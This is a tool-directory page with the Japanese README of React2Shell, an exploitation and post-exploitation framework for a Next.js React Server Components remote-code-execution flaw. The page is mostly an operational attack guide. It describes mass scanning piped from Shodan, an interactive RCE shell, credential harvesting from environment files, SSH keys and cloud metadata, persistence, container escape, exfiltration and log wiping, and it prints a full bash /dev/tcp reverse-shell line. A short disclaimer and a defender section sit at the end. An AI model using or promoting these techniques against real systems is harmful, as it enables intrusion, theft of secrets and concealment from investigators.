Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React2Shell — R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more. | Kitploit
ツール/GitHubGitHub/4nuxd/react2shell
Penetration Testing FrameworksPrivilege EscalationExploit FrameworksPersistence MechanismsLateral MovementWeb Application ExploitationData ExfiltrationPost-ExploitationCommand and ControlContainer Escape
GitHub
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →

概要

R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.

4nuxd/react2shell

React2Shell

リポジトリを見る
共有

🚀 R2S - Next.js RSC エクスプロイトフレームワーク

Version Python License CVE

Next.js React Server Components RCE 向け高度なポストエクスプロイトフレームワーク

機能 • インストール • 使い方 • コマンド • 例


📋 概要

R2S は、Next.js React Server Components の脆弱性 (CVE-2025-55182) を標的とした包括的なエクスプロイトおよびポストエクスプロイトフレームワークです。ファイル転送、永続化、列挙、権限昇格チェックなど、ペネトレーションテスト向けの高度な機能を備えたインタラクティブシェルを提供します。

🎯 主な機能

  • ✅ 自動脆弱性スキャン - 複数のターゲットを一括スキャン
  • ✅ インタラクティブ RCE シェル - ディレクトリ移動を伴うステートフルなコマンド実行
  • ✅ HTTP ベースのファイル転送 - base64 の制限なしにファイルをアップロード/ダウンロード
  • ✅ リバースシェルの自動化 - 25 種類以上のリバースシェルペイロードを試行
  • ✅ 高度な列挙 - システム、ネットワーク、コンテナ、クラウドメタデータ
  • ✅ 権限昇格 - 権限昇格ベクターの自動検出
  • ✅ 認証情報収集 - パスワード、鍵、トークン、シークレットの抽出
  • ✅ 永続化メカニズム - 再起動後もアクセスを維持
  • ✅ 横展開 - 他のホストを発見し、ピボット
  • ✅ コンテナエスケープ - Docker/Kubernetes の脱出ベクターをチェック
  • ✅ データ流出 - 機密ファイルや設定を抽出
  • ✅ ステルス操作 - ログの消去と痕跡の隠蔽

🔥 機能

🌐 コアエクスプロイト

  • マルチスレッド対応の一括スキャン
  • 他のツールと統合するためのパイプラインモード
  • Next.js RSC の自動脆弱性検出
  • 永続的な作業ディレクトリを持つステートフルなインタラクティブシェル

📁 ファイル操作

  • HTTP ベースのアップロード - wget/curl 経由でターゲットにファイルを転送
  • HTTP ベースのダウンロード - POST リクエスト経由でファイルを外部送信
  • サイズ制限なし - (base64 方式とは異なり) 大容量ファイルでも動作
  • 自動 HTTP サーバー - 必要に応じて起動/停止

🔍 偵察と列挙

  • システム列挙 - OS、カーネル、ユーザー、プロセス
  • ネットワーク探索 - インターフェース、ルート、ARP、DNS、待受ポート
  • コンテナ検出 - Docker、Kubernetes、LXC の識別
  • クラウドメタデータ - AWS、GCP、Azure の認証情報抽出
  • プロセスメモリダンプ - 実行中のプロセスからシークレットを抽出
  • 注目すべきファイルの発見 - SUID、書き込み可能ディレクトリ、バックアップ、設定ファイル

🔐 認証情報収集

  • 環境変数 (パスワード、API キー、トークン)
  • .env ファイルおよび設定ファイル
  • SSH 秘密鍵と authorized_keys
  • 機密コマンドを含む Bash 履歴
  • データベースファイル (SQLite、MySQL ダンプ)
  • クラウド認証情報 (AWS、Azure、GCP)
  • Git 認証情報と NPM トークン
  • ブラウザデータ (クッキー、ログインデータ)
  • Docker および Kubernetes シークレット

⬆️ 権限昇格

  • SUID/SGID バイナリ の検出
  • sudo 権限 の列挙
  • 書き込み可能なシステムファイル (/etc/passwd, /etc/shadow)
  • Docker ソケット のアクセスチェック
  • Linux ケイパビリティ の分析
  • カーネルエクスプロイト の提案
  • cron ジョブ の列挙
  • PATH ハイジャック の機会

🔄 ポストエクスプロイト

  • 永続化メカニズム - cron ジョブ、.bashrc、systemd サービス
  • 高度な永続化 - LD_PRELOAD、systemd タイマー
  • ポートスキャン - 内部ネットワークの偵察
  • 横展開 - SSH 鍵の発見、known_hosts の解析
  • コンテナエスケープ - 特権コンテナのチェック、ケイパビリティ分析
  • データ流出 - 機密データの自動収集
  • リバースシェルの自動化 - 25 種類以上のペイロードを自動リトライ付きで試行

🥷 ステルスと回避

  • ログ消去 - Bash 履歴、認証ログ、syslog
  • 痕跡隠蔽 - wtmp、lastlog のクリーンアップ
  • セッション管理 - セッションの保存と再開

🛠️ インストール

前提条件

root@kitploit:~
# Python 3.6 or higher
python3 --version

# Install dependencies
pip3 install requests urllib3

クイックスタート

root@kitploit:~
# Clone or download the tool
cd r2s-main

# Make executable (optional)
chmod +x r2s_enhanced.py

# Run the tool
python3 r2s_enhanced.py -h

🚀 使い方

基本構文

root@kitploit:~
python3 r2s_enhanced.py [OPTIONS]

コマンドラインオプション

入力方法

1. 単一ターゲット

root@kitploit:~
python3 r2s_enhanced.py -u http://target.com

2. 複数ターゲット (ファイル)

root@kitploit:~
python3 r2s_enhanced.py -l targets.txt -t 50

3. パイプラインモード (標準入力)

root@kitploit:~
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py

💻 インタラクティブシェルコマンド

RCE アクセスを獲得すると、以下のコマンドが使用できるインタラクティブシェルに入ります。

📂 ファイル転送

root@kitploit:~
upload <local_file> <remote_path>    # ファイルをターゲットにアップロード
download <remote_file> <local_path>  # ファイルをターゲットからダウンロード

🧭 ナビゲーション

root@kitploit:~
cd <directory>                       # 作業ディレクトリを変更
pwd                                  # 作業ディレクトリを表示

🔍 列挙

root@kitploit:~
enum                                 # 完全なシステム列挙
privesc                              # 権限昇格チェック
harvest                              # 認証情報収集
portscan <ip>                        # 内部ネットワークポートをスキャン
memdump [pid]                        # シークレットのためにプロセスメモリをダンプ

🎯 ポストエクスプロイト

root@kitploit:~
lateral                              # 横展開の機会
escape                               # コンテナエスケープベクター
exfil [type]                         # データを外部送信 (env/config/keys/db/logs/all)
reverse <lhost> <lport>              # 複数のリバースシェルペイロードを試行

🔒 永続化

root@kitploit:~
persist                              # 基本永続化を追加
advpersist                           # 高度な永続化を追加

🥷 ステルス

root@kitploit:~
stealth                              # ログを消去し痕跡を隠蔽

💾 セッション管理

root@kitploit:~
save                                 # 現在のセッションを保存
help, ?                              # ヘルプメッセージを表示
exit, quit                           # インタラクティブシェルを終了

🖥️ システムコマンド

任意のシェルコマンドを直接実行:

root@kitploit:~
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd

📚 例

例1: 基本的なエクスプロイト

root@kitploit:~
$ python3 r2s_enhanced.py -u http://vulnerable-app.com

    _   __          __  ____            
   / | / /__  _  __/ /_/ __ \________   
  /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
 / /|  /  __/>  </_ _/ _, _/ /__/  __/  
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   

   Next.js RSC Exploit Tool (CVE-2025-55182)
   Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)

   >> CREDIT( G4rxd )

[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id

[VULN] http://vulnerable-app.com >>> RCE SUCCESS
       Output: uid=1000(node) gid=1000(node) groups=1000(node)

[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse

[+] HTTP server started on 192.168.1.100:8000

next-rce:/app$

例2: システム列挙

root@kitploit:~
next-rce:/app$ enum

[*] Starting automated enumeration...

============================================================
[*] System Info
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"

============================================================
[*] Current User
============================================================
node
uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)

============================================================
[*] Container Detection
============================================================
12:devices:/docker/a1b2c3d4e5f6
11:cpuset:/docker/a1b2c3d4e5f6
[Docker container detected]

...

例3: ファイル転送

root@kitploit:~
# Upload a file
next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
[*] Uploading /tmp/exploit.sh (2048 bytes) via HTTP...
[+] Upload successful!
    -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh

# Download a file
next-rce:/app$ download /etc/passwd ./passwd.txt
[*] Downloading /etc/passwd via HTTP...
[+] Download successful! (1523 bytes)
    Saved to: ./passwd.txt

例4: 認証情報収集

root@kitploit:~
next-rce:/app$ harvest

[*] Harvesting credentials...

[*] Environment Variables:
DATABASE_PASSWORD=super_secret_pass
API_KEY=sk-1234567890abcdef
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[*] .env Files:
/app/.env
/app/.env.production
/var/www/.env.local

[*] SSH Keys:
/home/node/.ssh/id_rsa
/root/.ssh/id_rsa

...

例5: リバースシェル

root@kitploit:~
next-rce:/app$ reverse 192.168.1.100 4444

[*] Starting reverse shell attempts to 192.168.1.100:4444
[!] Make sure you have a listener running: nc -lvnp 4444

[*] Trying 25 different reverse shell payloads...

[1/25] Trying Bash TCP... ✓ Executed
[?] Did you receive a connection? (y/n/s to stop): y

[+] SUCCESS! Reverse shell established using: Bash TCP
[*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1

例6: 一括スキャン

root@kitploit:~
$ cat targets.txt
http://app1.example.com
http://app2.example.com
http://app3.example.com

$ python3 r2s_enhanced.py -l targets.txt -t 50

[*] Loaded 3 targets. Starting scan with 50 threads...

[VULN] http://app1.example.com >>> RCE SUCCESS
[VULN] http://app3.example.com >>> RCE SUCCESS

[*] Scan completed.

例7: 権限昇格チェック

root@kitploit:~
next-rce:/app$ privesc

[*] Checking privilege escalation vectors...

[*] SUID Binaries:
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

[*] Sudo Permissions:
User node may run the following commands:
    (ALL : ALL) NOPASSWD: /usr/bin/docker

[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] Docker Group:
In docker group - EXPLOITABLE!

...

例8: コンテナエスケープ

root@kitploit:~
next-rce:/app$ escape

[*] Checking container escape vectors...

[*] Container Type:
12:devices:/docker/a1b2c3d4e5f6

[*] Privileged Container:
PRIVILEGED

[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock

[*] Capabilities:
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
[Full capabilities - container is privileged]

...

🔧 高度な機能

リバースシェルペイロード

このツールには、複数の言語とテクニックにわたる 25 種類以上のリバースシェルペイロード が含まれています:

  • Bash (TCP、UDP、exec バリアント)
  • Netcat (traditional、mkfifo、OpenBSD)
  • Python/Python3 (socket、pty)
  • Perl (複数のバリアント)
  • PHP (exec、system、passthru)
  • Ruby (socket バリアント)
  • Node.js (child_process、socket)
  • Socat、Telnet、AWK
  • Golang、OpenSSL

クラウドメタデータ抽出

以下から認証情報を自動検出および抽出:

  • AWS - IAM ロール、セキュリティ認証情報
  • GCP - サービスアカウントトークン
  • Azure - インスタンスメタデータ
  • クラウド認証情報を含む環境変数

コンテナ検出

以下を識別および分析:

  • Docker コンテナ
  • Kubernetes Pod
  • LXC コンテナ
  • 特権あり vs 特権なし
  • 利用可能なエスケープベクター

⚠️ 法的免責事項

教育目的および許可されたテスト専用

このツールは教育目的および許可されたペネトレーションテストのみを目的として提供されています。事前の相互同意なしにターゲットを攻撃するためにこのツールを使用することは違法です。作者は本ツールの誤用または損害について一切の責任を負いません。

合法的な使用のための要件:

  • ✅ ターゲット所有者からの書面による許可
  • ✅ 明確に定義された範囲とエンゲージメントルール
  • ✅ 専門的なペネトレーションテストの実施
  • ❌ システムへの不正アクセス
  • ❌ 悪意のある意図または損害

🛡️ 検出と防御

防御側向け

検出方法:

  • 異常な Next-Action ヘッダーを監視
  • 存在しないエンドポイントへの multipart/form-data POST リクエストを探す
  • エラーレスポンス内の base64 エンコードされたコマンド出力を確認
  • Next.js のログで child_process.execSync を監視

緩和策:

  • Next.js を最新のパッチ適用バージョンに更新
  • Web アプリケーションファイアウォール (WAF) ルールを実装
  • サーバーサイドコードの実行を制限
  • すべての RSC リクエストを監視およびログ記録
  • 適切な入力検証を実装

📊 バージョン履歴

v4.1.0 (最新) - 拡張版

  • ✅ リバースシェル自動化を追加 (25 以上のペイロード)
  • ✅ メモリダンプ機能を追加
  • ✅ 横展開の発見を追加
  • ✅ コンテナエスケープチェックを追加
  • ✅ データ流出自動化を追加
  • ✅ 高度な永続化メカニズムを追加
  • ✅ HTTP ファイル転送を改善
  • ✅ 列挙機能を強化
  • ✅ エラーハンドリングと UX を改善

v4.0.0 - ポストエクスプロイトフレームワーク

  • ✅ HTTP ベースのファイル転送
  • ✅ 永続化メカニズム
  • ✅ ポートスキャナー
  • ✅ 権限昇格チェック
  • ✅ ネットワーク列挙
  • ✅ 認証情報収集
  • ✅ セッション管理
  • ✅ 自動列挙
  • ✅ ステルス機能

v3.0.0 - インタラクティブシェル

  • ディレクトリ移動可能なステートフルシェル
  • 基本ファイル転送 (base64)
  • エラーハンドリングの改善

🤝 貢献

貢献は歓迎します!すべての貢献が教育および防御セキュリティ目的であることを確認してください。


👨‍💻 作成者

G4rxd


🙏 クレジット

  • CVE-2025-55182 発見チーム
  • Next.js セキュリティ研究コミュニティ
  • オープンソースセキュリティツールコミュニティ

📄 ライセンス

このプロジェクトは教育目的および許可されたテスト目的のみでライセンスされています。


⚡ ハッピーエシカルハッキング! ⚡

大いなる力には大いなる責任が伴うことを忘れずに。

ツールをダウンロード
オプション説明デフォルト
-u, --url単一のターゲットURL-
-l, --listURLリストを含むファイル-
-c, --cmd実行する初期コマンドid
-t, --threadsスキャンスレッド数30
-p, --proxyHTTPプロキシ (例: http://127.0.0.1:8080)-
-v, --verbose詳細出力を有効化False
--http-portファイル転送用HTTPサーバーポート8000